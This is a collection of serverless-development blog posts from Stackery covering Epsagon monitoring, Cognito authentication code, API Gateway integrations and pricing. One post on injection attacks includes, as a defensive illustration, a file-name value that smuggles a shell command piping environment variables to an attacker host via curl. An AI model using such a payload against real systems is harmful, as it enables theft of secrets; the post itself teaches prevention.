Stacks on Stacks

The Serverless Ecosystem Blog by Stackery.


Tackle Serverless Observability Challenges with the New Stackery-Epsagon Integration
Sam Goldstein | April 15, 2019

Stackery is a tool to deploy complete serverless applications via Amazon Web Services (AWS). Epsagon monitors and tracks your serverless components to increase observability. Here’s how they can not only work together but improve each other.

Let’s start with a scenario: it’s late in the day on Thursday, traffic to your site is way up, and you have reports of problems. The sales and support teams say pages are failing to load, and your page monitoring is showing load times over 20 seconds!

No code was released today, but several teams merged changes over the last week, and you are seeing the highest traffic you’ve had all month.

To make matters worse, not only was code changed this week, but you’re using serverless tools, and the gal who does most of your configuration and deployment in the AWS console left on vacation yesterday. You’re not sure if she or her team changed something but you need to figure it out, stat.

What do you do?

Observability is a Problem for Serverless

For most of the usual operations headaches, like logging, storage, and replicability/expendability, serverless is a breeze: once you're paying a platform, a litany of concerns is no longer on you. But observability can be a problem, and if you're not using any additional tooling on top of AWS, it can be an even bigger problem with serverless than with traditional virtual machines.

Stackery and Epsagon can vastly increase the observability of your applications, making it much easier to see how your apps are working (or breaking) without having to examine their internal code or add debugging. Stackery has just launched a new integration that makes it easier to add Epsagon in just a few minutes.

How Stackery Makes Epsagon Better

With Epsagon, all you have to do to get detailed performance information on your Lambdas is add a function wrapper to your Lambda code. Couldn’t get much easier than that, right? How about automatically instrumenting all your functions all at once?!
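
For reference, here's roughly what that manual wrapping looks like with the epsagon npm package (a sketch; the token and app name are placeholders). The integration described below does this for every function automatically:

const epsagon = require('epsagon');

epsagon.init({
  token: 'YOUR_EPSAGON_TOKEN', // placeholder; this is the token you give Stackery
  appName: 'my-app',           // placeholder
  metadataOnly: false          // send full payloads, not just metadata
});

// Wrap the handler so Epsagon traces each invocation
function handler(event, context, callback) {
  callback(null, 'It worked!');
}

exports.handler = epsagon.lambdaWrapper(handler);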

With Stackery’s new “integrations” section, just add your Epsagon token to instrument your Lambdas. After you enter the token, your Lambdas will be instrumented at their next deployment.

One of the biggest benefits of using Stackery with Epsagon is the ability to track all changes to your serverless infrastructure as code changes (tracked by version control).

When you add a new component in Stackery’s canvas, it creates a tracked change in your application’s template file; this uses AWS’s open-source Serverless Application Model (SAM). When you’re looking at your Epsagon dashboard and seeing a problem start at an exact time, you can look at your application’s repository and see everything that changed in your stack.

Need to add a database or change a Lambda’s permissions? This will no longer be a change that happened somewhere at some time in the AWS console but a change tracked just as well as any other code commit.

How Epsagon Makes Stackery Better

Along with tracking invocations and errors, Epsagon can give you great metadata insights about your serverless environment as a whole.

The dashboard will help you identify functions that should perhaps be cleaned up due to low traffic, as well as areas that need attention.

If you notice worrying patterns, you can follow the link back to Stackery and see how that Lambda is connected to your other services.

From the Stackery side, you can quickly configure resources and edit your stack configuration.

Try it Yourself

If your team is serious about using serverless to build professional-grade applications, it becomes necessary to use tools on top of AWS to take care of observability. Stackery and Epsagon are each strong in their respective capacities, but when it comes to upping your serverless observability, they complement one another well. Now, it’s easier than ever to use both in harmony.

Want to deploy a serverless app with instrumentation in 10 minutes? To get started you’ll need to sign up with Stackery and create an Epsagon account. After that, check our documentation on using the integration.

Developer's Guide to Cognito with Stackery
Matthew Bradburn | April 12, 2019

Stackery has a cloud-based app for building and deploying serverless applications, and we use Cognito for our own authentication. This guide will help you set up an authentication back-end for a largely static site.

Cognito is AWS’s cloud solution for authentication – if you’re building an app that handles users with passwords, you can use AWS to handle the tricky high-risk security issues related to storing login credentials. No need to go it alone! Pricing is based on your number of monthly active users, and the first 50k users are free. For apps I’ve worked on, we would have been very pleased to grow out of that free tier. Cognito can also handle social logins, such as “log in with Facebook” and so forth.

One initial barrier to learning Cognito is the number of different architectures and authentication flows that can be implemented. You can use it from a smartphone app or a web app, and you may want to talk to Cognito from the front end as well as the back-end. And security-related APIs tend to be complicated in general.

Ordinarily, you’d do sign-in from a more structured JavaScript environment like React, but in this case we create user accounts from a back-end Node.js server and do sign-in from a mostly static website. This isn’t all that tricky, but the problem with not using React is that a lot of examples aren’t applicable (if you want some great React tutorials for Cognito, check out serverless-stack’s and Nader Dabit’s on Hackernoon).

Account Creation

User accounts are created programmatically from the API server, which talks to Cognito as an administrator. A user record within your own database needs to be created at that time, so that process needs to be controlled. For security, don’t store user credentials yourself. The Cognito user pool should be configured such that only admins can create users – the users do not sign themselves up directly.

Setting up the Cognito User Pool is easy once you know what to do. The Cognito defaults are good for what we’re doing, although we disable user sign-ups and set “only allow administrators to create users”. We have a single app client, although it’s possible to have more. When we create the app client, we do not ask Cognito to generate a client secret – since we do log in from a web page, there isn’t a good way to keep secrets of this type. We set “enable sign-in API for server-based authentication”, named ADMIN_NO_SRP_AUTH. “SRP” here stands for “Secure Remote Password”, which is a protocol in which a user can be authenticated by a remote server without sending their password over the network. It would be vital for doing authentication over an insecure network, but we don’t need it.
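
If you later want the same setup captured as infrastructure as code, the admin-only sign-up option maps to a CloudFormation property. A minimal sketch (the resource and pool names are illustrative):

  UserPool:
    Type: AWS::Cognito::UserPool
    Properties:
      UserPoolName: my-app-users
      AdminCreateUserConfig:
        # Users cannot sign themselves up; only admins create accounts
        AllowAdminCreateUserOnly: true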

Assuming you’re creating your own similar setup, you’ll need to note your User Pool ID and App Client ID, which are used for every kind of subsequent operation.

Cognito also makes a public key available that is used later to verify that the client has successfully authenticated. Cognito uses RSA, which involves a public/private key pair. The private key is used to sign a content payload, which is given to the client (it’s a JWT, JSON Web Token), and the client gives that JWT to the server in the header of its authenticated requests. Our API server uses the public key to verify that the JWT was signed with the private key.

There are actually multiple public keys involved, but they’re available from Cognito as a JWKS (“JSON Web Key Set”). To retrieve them you have to substitute your region and user pool ID and send a GET to this endpoint:

https://cognito-idp.{region}.amazonaws.com/{userPoolId}/.well-known/jwks.json

To get a user account created from the website, we send an unauthenticated POST to our API server’s /accounts endpoint, where the request includes the user’s particulars (name and email address) and plaintext password – so this connection to the API server must obviously be over HTTPS. Our API server creates a user record in our database and uses that record’s key as our own user ID. Then we use the Cognito admin API to create the user:

const AWS = require('aws-sdk');
const cognito = new AWS.CognitoIdentityServiceProvider();

// userId - our user record index key
// email - the new user's email address
// password - the new user's password
function createCognitoUser(userId, email, password) {
  let params = {
    UserPoolId: USER_POOL_ID, // From Cognito dashboard "Pool Id"
    Username: userId,
    MessageAction: 'SUPPRESS', // Do not send welcome email
    TemporaryPassword: password,
    UserAttributes: [
      {
        Name: 'email',
        Value: email
      },
      {
        // Don't verify email addresses
        Name: 'email_verified',
        Value: 'true'
      }
    ]
  };

  return cognito.adminCreateUser(params).promise()
    .then((data) => {
      // We created the user above, but the password is marked as temporary.
      // We need to set the password again. Initiate an auth challenge to get
      // started.
      let params = {
        AuthFlow: 'ADMIN_NO_SRP_AUTH',
        ClientId: USER_POOL_CLIENT_ID, // From Cognito dashboard, generated app client id
        UserPoolId: USER_POOL_ID,
        AuthParameters: {
          USERNAME: userId,
          PASSWORD: password
        }
      };
      return cognito.adminInitiateAuth(params).promise();
    })
    .then((data) => {
      // We now have a proper challenge, set the password permanently.
      let challengeResponseData = {
        USERNAME: userId,
        NEW_PASSWORD: password,
      };

      let params = {
        ChallengeName: 'NEW_PASSWORD_REQUIRED',
        ClientId: USER_POOL_CLIENT_ID,
        UserPoolId: USER_POOL_ID,
        ChallengeResponses: challengeResponseData,
        Session: data.Session
      };
      return cognito.adminRespondToAuthChallenge(params).promise();
    })
    .catch(console.error);
}

Of course, the server needs admin access to the user pool, which can be arranged by putting AWS credentials in environment variables or in a profile accessible to the server.

Cognito wants users to have an initial password that they must change when they first log in. We didn’t want to do it that way, so during the server-side account creation process, while we still have the user’s plaintext password, we authenticate with it and set the user’s desired password as the permanent password. Once that authentication completes, the user’s password is stored only in encrypted form in Cognito. The authentication process gives us a set of access and refresh tokens as a result, but we don’t need them for anything on the server side.

Client Authentication

When the users later want to authenticate themselves, they do that directly with Cognito from a login web form, which requires no interaction with our API server. Our web page includes the Cognito client SDK bundle. You can read about it on NPM, where there’s a download link:

amazon-cognito-identity-js

Our web page uses “Use Case 4” described on that page, in which we call Cognito’s authenticateUser() API to get a JWT access token. That JWT is sent to our API server with subsequent requests in the HTTP Authorization header.
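
As a rough sketch of that use case (the pool ID, client ID, and credentials below are placeholders), the flow looks like this:

const AmazonCognitoIdentity = require('amazon-cognito-identity-js');

const userPool = new AmazonCognitoIdentity.CognitoUserPool({
  UserPoolId: 'us-east-1_XXXXXXXXX', // placeholder
  ClientId: 'XXXXXXXXXXXXXXXXXXXXXXXXXX' // placeholder
});

const cognitoUser = new AmazonCognitoIdentity.CognitoUser({
  Username: 'user@example.com',
  Pool: userPool
});

const authDetails = new AmazonCognitoIdentity.AuthenticationDetails({
  Username: 'user@example.com',
  Password: 'correct-horse-battery-staple'
});

cognitoUser.authenticateUser(authDetails, {
  onSuccess: (result) => {
    // This token goes in the Authorization header of authenticated requests
    const accessToken = result.getAccessToken().getJwtToken();
    console.log(accessToken);
  },
  onFailure: (err) => console.error(err)
});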

Server Verification

The API server needs to verify that the client is actually authenticated, and it does this by decoding the JWT. It has the public key set that we downloaded as above, and we follow the verification process described here:

decode-verify-jwt

One of the items in the JWT payload is the username, which allows us to look up our own user record for the authenticated user.
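
Sketched with the jsonwebtoken and jwk-to-pem npm packages (our choice of libraries; the linked example walks through the same steps), verification looks roughly like this, assuming the JWKS has already been fetched from the endpoint above:

const jwt = require('jsonwebtoken');
const jwkToPem = require('jwk-to-pem');

function verifyCognitoJwt(token, jwks) {
  // The JWT header names the key ("kid") that signed this token
  const decoded = jwt.decode(token, { complete: true });
  if (!decoded) throw new Error('Not a valid JWT');

  const jwk = jwks.keys.find((key) => key.kid === decoded.header.kid);
  if (!jwk) throw new Error('Unknown signing key');

  // Convert the JWK to PEM form, then verify the signature and expiry
  const pem = jwkToPem(jwk);
  const payload = jwt.verify(token, pem, { algorithms: ['RS256'] });

  // payload.username identifies the user (access tokens; ID tokens
  // carry the "cognito:username" claim instead)
  return payload;
}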

How Stackery can help

As you continue to build with Cognito, Stackery can help you create complex architectures that your whole team can collaborate on.

Stackery generates CloudFormation templates using a powerful visual canvas and can create both Cognito User Pools and User Pool Clients.

[Screenshot: Cognito User Pool and User Pool Client resources on the Stackery canvas]

Stackery also manages your environments and secrets, with easy controls for team permissions.

Tour some of Stackery’s other capabilities in under four minutes with this video:

Stackery Product Features on YouTube

The Future of Serverless is… Functionless?
Chase Douglas | April 11, 2019

I’m in a position where I converse with our customers and cloud service providers, and I keep track of conversations happening through blogs and social media. I then sift through all this data to identify patterns and trends. Lately, I’ve seen some talk about an architectural pattern that I believe will become prevalent in the near future.

I first heard about this pattern a few years ago at a ServerlessConf from a consultant who was helping a “big bank” convert to serverless. They needed to ingest data from an API and put it in a DynamoDB table. The typical way this is implemented looks like this:

[Diagram: an API Gateway endpoint invokes a “Save Record” Lambda function, which writes to a DynamoDB table]

There’s nothing inherently wrong with this approach. It will scale just fine… unless you hit your account-wide Lambda limit. Oh, and you’re also paying for invocations of the Save Record function, which isn’t intrinsically providing business value. We’ve also added a maintenance liability for the code running in Save Record: what if it’s on Node.js 6.10, which is approaching EOL for AWS Lambda?

A Functionless Approach

The “big bank” consultant was ahead of the curve and helped them implement a better approach. What if, instead, we could do the following:

[Diagram: the API Gateway endpoint writes to the DynamoDB table directly, with no Lambda function in between]

This may seem magical, but it’s possible using advanced mechanisms built into AWS API Gateway. Let’s step back and think about what happens when you integrate an API route with a Lambda Function. We’re used to using frameworks like AWS SAM that abstract away how the integration is implemented under the covers, but in simple terms, the API Gateway Route is set up to make an HTTP request to the AWS Lambda service and wait for the response. Some lightweight transformations are used to enable passing request parameters to the Function and to pass response parts (status code, headers, and body) from the Function response back to the HTTP client.

The same techniques can be used to integrate an API Gateway Route with any other AWS service. API Gateway can handle authentication itself, so as long as you can apply a small transformation to the incoming API request to generate a request to an AWS service, you don’t need a Lambda Function for many API route actions.
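
To make that concrete, here is a hedged sketch (not the consultant’s actual template) of a CloudFormation API Gateway method that maps a POST body straight into a DynamoDB PutItem call via a Velocity request template. The resource names, the role, and the assumed request body shape ({"payload": "..."}) are all hypothetical:

  SaveRecordMethod:
    Type: AWS::ApiGateway::Method
    Properties:
      RestApiId: !Ref RecordsApi          # hypothetical API
      ResourceId: !Ref RecordsResource    # hypothetical /records resource
      HttpMethod: POST
      AuthorizationType: AWS_IAM
      Integration:
        Type: AWS
        IntegrationHttpMethod: POST
        # Call DynamoDB's PutItem action directly; no Lambda in between
        Uri: !Sub arn:aws:apigateway:${AWS::Region}:dynamodb:action/PutItem
        Credentials: !GetAtt ApiDynamoRole.Arn  # role allowing dynamodb:PutItem
        RequestTemplates:
          # Velocity template translating the HTTP request into a PutItem call
          application/json: |
            {
              "TableName": "Records",
              "Item": {
                "id": { "S": "$context.requestId" },
                "payload": { "S": $input.json('$.payload') }
              }
            }
        IntegrationResponses:
          - StatusCode: 200
            ResponseTemplates:
              application/json: '{"ok": true}'
      MethodResponses:
        - StatusCode: 200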

While this functionality has been obscured in API Gateway (for a multitude of reasons), it’s front and center in AppSync: AWS’s fully-managed GraphQL service. With AppSync, DynamoDB Tables, SQL Databases (via Aurora Serverless), Lambda Functions, and Elasticsearch domains have all been elevated as first-class “Data Sources” for GraphQL resolvers. Here’s an example API built using these default “Data Sources”:

[Diagram: an AppSync GraphQL API resolving queries against a third-party HTTP API and a DynamoDB table]

This API can query a stock price from a third-party API (Alpha Vantage) and record trades in a DynamoDB table, all without needing to write code for, or provision, Lambda Functions.

What Skills Do Engineers Need For This New Technique?

All this sounds great, but how do you build and operate API-Integration driven applications? Because this is such a new technique, there aren’t a lot of examples to learn from, and the documentation available is mostly of the “reference” variety rather than “how-tos” or “use cases”.

Developers tend to be comfortable with SDK contracts: “When the API route is invoked, my Lambda Function will get this data in JSON, and I can call that AWS service using their SDK with public docs.” Unfortunately, direct integrations are currently a bit more difficult to build.

Engineers need specific new skills and information. In particular, how to:

  • Write Apache Velocity macros to translate API requests to AWS service actions. This is a standard mechanism for declaratively transforming HTTP requests not only in AWS API Gateway and AppSync, but in many other contexts, including Web Application Firewalls.

  • Construct infrastructure templates (e.g. CloudFormation / SAM) to integrate API resources with other AWS services (e.g. DynamoDB Tables and Aurora Serverless Databases)

  • “Operate” a functionless, API-integration-driven application (i.e. where are request logs, how are they structured, how will errors be surfaced and acted upon, etc.)

At Stackery, we help our customers figure out the above. If you want to try your hand at this type of development, sign up for Stackery and don’t be afraid to reach out if you have any questions or need help on your own serverless journey! Drop us a line via email (support@stackery.io) or fill out our contact form.

Also, be sure to join the Stackery livestream on this subject on April 24th at 10 AM PDT. I’ll be hosting it alongside iRobot’s Richard Boyd. We’ll dive a bit deeper into Lambda Functions and REST APIs and answer any questions you might have!

You're Clouding — But are you Clouding Properly?
Abner Germanow | April 08, 2019

If you even partly believe Marc Andreessen’s 2011 “software is eating the world” comment, it stands to reason that companies who are good at software will be the winners in a digital world. Given this, I find it ironic that little large-scale research has gone into what it takes to be good at software. Despite the $6B a year spent on IT research, there is only one research company with a long-term focus on developers (RedMonk) and one research team with a long-term focus on what it takes to successfully run a world-class software organization (DORA). All the other firms are playing catch-up.

If you aren’t familiar with DORA’s work, you should be. Stemming from the State of DevOps research originally sponsored by Puppet Labs in 2014, the annual study quickly grew in sample size, breadth, and a connection to business outcomes by looking at the financial results of public companies. This set of research includes data from both the annual public survey of software teams and data from a private benchmarking service. It’s fair to say that Dr. Nicole Forsgren, Jez Humble, and Co. have successfully collected more data on software team behaviors than anyone else in the world.

Defining proper clouding

Among the headlines of the 2018 study mangled by overly excited people on Twitter was the notion that teams using cloud are 23 times as likely to be elite performers relative to other software teams.

Check out this video where Nicole and Jez troll an auditorium full of software leaders on the truth of that line:

According to the NIST definition that Nicole and Jez rightly subscribe to, what is the actual outcome and definition of using cloud well? From an outcomes perspective, you are 23 times more likely to be an elite performing software team if you are using the cloud properly, which, by the NIST definition, means your use of cloud services should have these attributes:

1. On-demand self-service. Anyone in the organization can self-service the cloud resources they want on demand.

2. Broad network access. Access cloud resources on any device.

3. Resource pooling. Compute resources should be managed efficiently.

4. The appearance of infinite resources. Or, as Dr. Forsgren says, “Bursty like magic.”

5. Measured services. You only pay for what you use.

Serverless and clouding properly

Everyone wants to be an elite performer, so let’s look at this list through the lens of serverless and Stackery. I’m going to reverse the order because #5 and #4 carry the core definitions of what I mean when I say the word serverless.

5. Measured services: you only get charged for what you use.

Check plus on this one. The number of services now available on a charge-by-use basis is skyrocketing. Serverless databases, API gateways, storage, CDNs, secrets management, GraphQL, data streams, containers, functions, and more. These services represent both a focal point of cloud service provider innovation and undifferentiated burden for most companies. When these services are used as application building blocks, it significantly reduces the amount of code a team needs to write in order to deliver an application into production.

Another often overlooked aspect of these pay-for-use services is that they are configured, connected, and managed with infrastructure as code. Stackery makes the process of composing these services into an application architecture super easy, enabling teams to test and swap out the services best suited to the behaviors of their application.

4. The appearance of infinite resources. “Bursty like magic.”

Again, another check plus. Not only are all those services in the prior section evolving and innovating like mad, but most of them can also automatically burst way past the capabilities of what most enterprise cloud ops teams can support. Most can scale right down to zero, too. The nature of this scaling behavior even shifts how developers prioritize how they write code.

See James Beswick’s take on saving time and money with AWS Lambda using asynchronous programming: Part 1 and Part 2.

3. Resource pooling.

Check plus plus? With serverless, resource pooling isn’t even a thing anymore. When you build apps on foundational building blocks of serverless databases, storage, functions, containers, and whatever else you need, resource pooling is the cloud provider’s problem.

2. Broad network access. Access cloud resources on any device.

Ok, sure. I’ll admit, I think this one is intended to throw a wet blanket on private cloud-ish datacenters where resource access is limited to black Soviet-era laptops. Otherwise, the public cloud, including all the serverless offerings, checks the box on this one.

1. On-demand self-service. Anyone in the organization can self-service the cloud resources they want on demand.

With Stackery? Check plus.

Without Stackery, serverless offerings have made some efforts to solve this problem, but as soon as you add in existing databases or multiple cloud accounts, things get pretty tough to manage as you scale up the number of services and collaborators working on the application.

When building server-centric applications, developers replicate a version of the services running in production on their laptops: databases, storage, streaming, and other dependencies. They then test and iterate on the app until it works on the laptop. When developing serverless apps, that localhost foundation shifts to a cloud services foundation, where the application code is still cycled on the developer’s laptop, but the rest of the stack, and the app as a whole, needs to be tested and iterated cloud-side.

This is the opposite of how many organizations operate, where access to a cloud provider account requires an official act from on high, a remnant from the days when compute resources were really expensive. This is also why developers at those same companies have personal cloud accounts. While I’m sure that’s fine from a security perspective (not), even in companies that provision developer accounts, cloud providers don’t have native ways of managing dev/test/prod environments.

That’s where Stackery comes in to automate the namespacing, versioning, and attributes of every environment. For example, dev and test environments should access test databases while prod should access the production database. Stackery customers embracing serverless development generally provision each developer with two AWS dev environments, and then a set of team dev, test, staging, and production environments across several AWS accounts.

Anyone can become an elite performer

As Dr. Forsgren says, being an elite performer is accessible to all; you just have to execute. With a Stackery account and an AWS account, your existing IDE, Git repo, and CI/CD, you too can be on your way to being an elite performer. Get started today.

And make sure you go take the 2019 survey!

Injection Attacks: Protecting Your Serverless Functions
Garrett Gillas | February 28, 2019

Security is Less of a Problem with Serverless but Still Critical

While trying to verify the claims made on a somewhat facile rundown of serverless security threats, I ran across Jeremy Daly’s excellent writeup of a single vulnerability type in serverless, itself inspired by a fantastic talk from Ory Segal on vulnerabilities in serverless apps. At first I wanted to describe how injection attacks can happen. But the fact is, the two resources I just shared serve as amazing documentation; Ory found examples of these vulnerabilities in active GitHub repos! Instead, it makes more sense to recap their great work before diving into some of the ways that teams can protect themselves.

A Recap on Injection Vulnerability

It might seem like a serverless function just isn’t vulnerable to code injection. After all, it’s just a few lines of code. How much information could you steal from it? How much damage could you possibly do?

The reality is, despite Lambdas running on a highly managed OS layer, that layer still exists and can be manipulated. To put it another way, to be comprehensible and usable to developers of existing web apps, Lambdas need to have the normal abilities of a program running on an OS. Lambdas need to be able to send HTTP requests to arbitrary URLs, so a successful attack will be able to do the same. Lambdas need to be able to load their environment variables, so successful attacks can send all the variables on the stack to an arbitrary URL!

The attack is straightforward enough: a user-submitted file name contains a string that ends in a shell escape and command. The careless developer parses the file with a shell command, and the embedded command gets run.
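
A hypothetical illustration of the pattern (not Ory’s exact example) in a Node.js Lambda that shells out to inspect an uploaded file:

const { exec, execFile } = require('child_process');

// Vulnerable: the file name is interpolated into a shell command line
exports.vulnerableHandler = (event, context, callback) => {
  // A fileName like "x; env | curl -d @- https://attacker.example" runs the
  // attacker's command, with this function's environment variables in scope
  exec(`file /tmp/uploads/${event.fileName}`, callback);
};

// Safer: execFile passes the name as a literal argument, never through a
// shell, so embedded metacharacters are not interpreted (you should still
// validate the name against an allowlist pattern)
exports.saferHandler = (event, context, callback) => {
  execFile('file', [`/tmp/uploads/${event.fileName}`], callback);
};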

What are the principles at work here?

It’s simple enough to say ‘sanitize your inputs’ but some factors involved here are a bit more complicated than that:

  • Lambdas, no matter how small and simple, can leak useful information
  • There are many sources of events, and almost all of them could include user input
  • With interdependence between serverless resources, user input can come from unexpected angles
  • Event data, resource names, and other inputs can arrive from many sources and in many formats

In case this should seem like a largely theoretical problem, note that Ory’s presentation used examples found in the wild on Github.

Solution 1: Secure Your Functions

On Amazon Web Services (AWS), serverless functions are created with no special abilities within your other AWS resources. You need to give them permissions and connect them up to events from various sources. If your Lambdas need storage, it can be tempting to give them permissions to access your S3 buckets.

In AWS’s example, the permissions given by the policy cover only the two buckets we need for read/write. This is good!
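
Since the policy itself isn’t reproduced here, this sketch shows what a similarly scoped policy might look like attached to a SAM function (the bucket and function names are illustrative):

  ProcessUploads:
    Type: AWS::Serverless::Function
    Properties:
      # ...handler, runtime, and events elided...
      Policies:
        - Version: '2012-10-17'
          Statement:
            # Read from the input bucket, write to the output bucket, nothing else
            - Effect: Allow
              Action: s3:GetObject
              Resource: arn:aws:s3:::my-input-bucket/*
            - Effect: Allow
              Action: s3:PutObject
              Resource: arn:aws:s3:::my-output-bucket/*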

If you’re using Lambdas in diverse roles, this means not using a single IAM policy for all your Lambdas. It’s possible to generalize somewhat and re-use policies, but this takes some monitoring of its own.

How Stackery Can Help

The creation and monitoring of multiple IAM roles for a single stack can get pretty arduous when done manually. I like writing JSON as much as the next person, but multiple permissions can also get tough to manage.

With Stackery, giving functions permissions to access a single bucket or database is as easy as drawing a line.

Even better, the Stackery dashboard makes it easy to see what permissions exist between your resources.

How Twistlock Can Help

Keeping a close eye on your permissions is a great general guideline, but we have to be realistic: dynamic teams need to make large, fast changes to their stack, and mistakes are going to happen. Without some kind of warning that our usual policies have been violated, there’s a good chance that vulnerabilities will go out to production.

Twistlock lets you set overall policies either in sections or system-wide for where traffic should be allowed. It can generate warnings when policies are violated or even block traffic, for example between a lambda that serves public information and a database with Personally Identifiable Information (PII).

Twistlock can also scan memory for suspect strings, meaning that, without any special engineering effort, it can detect when a key is being passed around when it shouldn’t be.

Further Reading

Ory Segal has a blog post on testing for SQL injection in Lambdas using open source tools. Even if you’re not going to roll your own security, it’s a great tour of the nature of the attacks that are possible.

Stackery and Twistlock work great together; in fact, we wrote up a solution brief about it. Serverless architecture is rapidly becoming the best way to roll out powerful, secure applications. Get the full guide here.




Cloud-Side Development For All with Stackery's Free Tier
Nate Taggart | February 26, 2019

New Pricing & Free Tier

Today, I’m thrilled to announce our new free tier and pricing model for teams adopting modern serverless application development. I believe cloud-side development is the future and I want everyone to experience it at their own pace. We also now offer a model that can scale with either teams or workflows depending on how aggressively you decide to adopt cloud-side development.

How Software Development in the Cloud Has Changed

While we’ve been at this for a while, it’s worth reviewing where development workflows came from and what’s changing.

When “the cloud” first emerged, the prevailing development pattern was to spin up a generic (EC2) server and install software on it to customize its behavior. These customized behaviors might include event streams, data stores, database tables, APIs, or whatever else an application requires. That software, however, is now offered by the cloud providers as a pay-per-use capability that can be configured and requested with infrastructure-as-code (IaC).

Cloud providers have released hundreds of new services which, at their core, are purpose-built, use-case-driven, software-managed services. It’s no longer necessary to spin up a cluster of servers to stand up Kafka if you need a message streaming service, because it’s much faster and arguably cheaper (in terms of people, overhead and maintenance) to simply pull a streaming service like Kinesis or a managed Kafka service off the shelf of the Amazon Web Services menu.

You Can’t Replicate AWS on Your Laptop

The rise of these managed cloud services has fundamentally changed the model for modern application development.

Of course, the core advantage of this model is that it has become easy to architect at-scale systems in the cloud with very little operational overhead. The consequence of this change, however, is that the software development lifecycle has fundamentally changed. No longer can your laptop act as a development server (localhost). This was a great tool for replicating and testing server-like behavior in local development when the fundamental infrastructure underpinning everything was a server. But now, rather than raw servers, applications are composed of a collection of managed cloud services. Localhost has become a poor representation of the production environment, as it is impossible to replicate all of the functionality of AWS locally on a laptop.

This is driving a shift toward cloud-side development. This doesn’t mean you need to write code through a web browser; your favorite IDE will still work for your application code. But to test and iterate on the full application stack through the development cycle, you must now stand up development instances of the managed services you’re using to compose an application. Crucially, cloud-side development is about service composition: composing your application architecture from off-the-shelf services to accelerate at-scale application development and rapidly iterating on a cloud-native implementation of your application.

What does this tell us? Cloud-side development isn’t just the future, it’s now and it’s big. How big? At re:Invent 2018, AWS executives proclaimed hundreds of thousands of developers are actively developing with AWS’s menu of managed cloud services and Lambda. That’s big.

What tooling does cloud-side development require?

Here is the good news: your IDE, code repository, and CI/CD systems don’t change. What changes? How you manage stacks in the cloud and how you build and iterate on stacks with your team.

Stackery now offers easy-to-consume tooling and environment-management capabilities to every organization trying to deliver faster. To build Stackery, we’ve thought about, experienced, and built safeguards around the ways teams can get into trouble composing applications out of managed cloud services. All while keeping every output in standard CloudFormation, in case you decide to go back to doing things the hard way.

Managing Active Stacks in the Cloud

Cloud-side development tools must automate and accelerate the iterative nature of development work on top of cloud managed services. This includes rapidly configuring, deploying, sandboxing, namespacing, and managing individual instances of cloud services for each developer involved in the development. At Stackery, we call these active stacks. Cloud-side tools will include automation around packaging and building your code, version controlling your IaC, managing developer environments, instrumentation, governance, and automating the release process across multiple environments and cloud accounts.

Building Stacks

Until recently, cloud-side development of complex applications using managed cloud services was limited to engineers dedicated to cloud innovation (and YAML). That human investment is still useful but should be applied to setting patterns instead of troubleshooting misplaced characters. Infrastructure as code is the new assembly language. It is machine-readable and unforgiving, which means tooling needs to help developers do things like attach a handler to a resource in seconds while properly setting all the correct permissions, and more. Speaking of resources…

New! Amazon Aurora Serverless and Amazon Cognito

We owe a lot of kudos to our earliest customers, who pushed us to add the most popular services needed to visually compose modern applications. Most recently: Amazon Aurora Serverless (database) and Amazon Cognito (user authentication). We’ve also just added the “Anything Resource”, which enables our users to add any AWS CloudFormation resource type beyond the (now 20!!) types currently available in the Stackery resource palette. We like to say it takes a serverless team to keep up with a serverless team.

The Stackery Developer & Teams Plans

And now, with the introduction of our free Developer plan, we’re excited to unleash the possibilities of cloud-side development to everyone who wants to experience the power of the cloud. The Stackery Developer plan includes 6 free active stacks, which is plenty to get a side-project or proof of concept up and running. After you consume the first six stacks or if you want more support or collaborators in the account, additional active stacks can be added for $10 a month per stack. More details here.

Bring your own IDE, Git repository (blank, or with existing AWS SAM or serverless.yml files), AWS account, and your CI/CD system if you like; Stackery will accelerate you into cloud-side development. It’s time to go build.


Further Reading On Cloud-Side Development:


The Anatomy of a Serverless App

We call an application deployed into a cloud service provider an active stack. This stack has three primary components: the functions where the business logic resides, the managed cloud services that serve as the building blocks of the application, and the environmental elements that define the specific dependencies and credentials for a particular instance of the first two components. This anatomy of a serverless application post goes into full detail on what serverless teams will build and manage.

Our friends at Lumigo on the need to test cloud-side (and some slower and manual non-Stackery methods for doing so).

Corey Quinn of Last Week in AWS (sign up for the snark, stay for the news, pay for the bill reduction) sparked this conversation on Twitter.


Likewise, this “localhost is dead to me” rant by Matt Weagle, organizer of the Seattle Serverless Days, won him a shiny new Stackery account. This thread also garnered some helpful nuance and commentary from Amazon engineers James Hood, Preston Tamkin, and iRobot’s Ben Kehoe.


Creating Cognito User Pools with CloudFormation
Matthew Bradburn | January 31, 2019

I’ve been working on creating AWS Cognito User Pools in CloudFormation, and thought this would be a good time to share some of what I’ve learned.

As an overview of this project:

  • For sign-up, I’m creating Cognito users directly from my server app. It’s also possible to have users create their own accounts in Cognito, but that’s not what I want.
  • I want to use email addresses as the user names, rather than having user names with separate associated email addresses.
  • I don’t want the users to have to mess around with temporary passwords. This is part of the ordinary Cognito workflow, but I set the initial password in my server-side code and then immediately reset the password to the same value. So there is a temporary password, but the users don’t notice it.
  • Sign-in is a transaction directly between the client-side app and Cognito; the client gets a JWT (JSON Web Token) from Cognito, which is validated by my AuthenticatedApi function on the back-end.
  • The Cognito User Pool, Lambda functions, etc., are created by CloudFormation with a SAM (Serverless Application Model) template.

Sample Source

The source code for this project is available from my GitHub. The disclaimer is that the source is pretty rough and should be tidied before being used in production.

Template Generation

I used the Stackery editor to lay out the components and generate a template.

The template is available in the Git repo as template.yaml.

This is a simple application; I have an Api Gateway that my client app will hit, with one endpoint to effect sign-up and one to demonstrate an authenticated API. Each of these endpoints invokes a separate Lambda function. Those functions have access to my User Pool.

I’ve wired the User Pool’s triggered functions up just as an experiment. Currently all the triggers invoke my CognitoTriggered function, which is currently logging the input messages but that’s all – according to my understanding, these functions work by modifying the input message and returning it, but my function returns the input message unmolested.

I’ve hand-edited the SAM template to add the user pool client:

  UserPoolClient:
    Type: AWS::Cognito::UserPoolClient
    Properties:
      ClientName: my-app
      GenerateSecret: false
      UserPoolId: !Ref UserPool
      ExplicitAuthFlows:
        - ADMIN_NO_SRP_AUTH

I’ve set GenerateSecret to false because in a web app it’s hard to keep a secret of this type. We use ADMIN_NO_SRP_AUTH during the user creation process as Admin. I’ve also added an environment variable to each of my functions so they’ll get the user pool client ID.
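
In the SAM template, that addition looks something like this (the function name is illustrative and its other properties are elided):

  SignUpHandler:
    Type: AWS::Serverless::Function
    Properties:
      # ...handler, runtime, and events elided...
      Environment:
        Variables:
          USER_POOL_ID: !Ref UserPool
          USER_POOL_CLIENT_ID: !Ref UserPoolClient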

Deployment

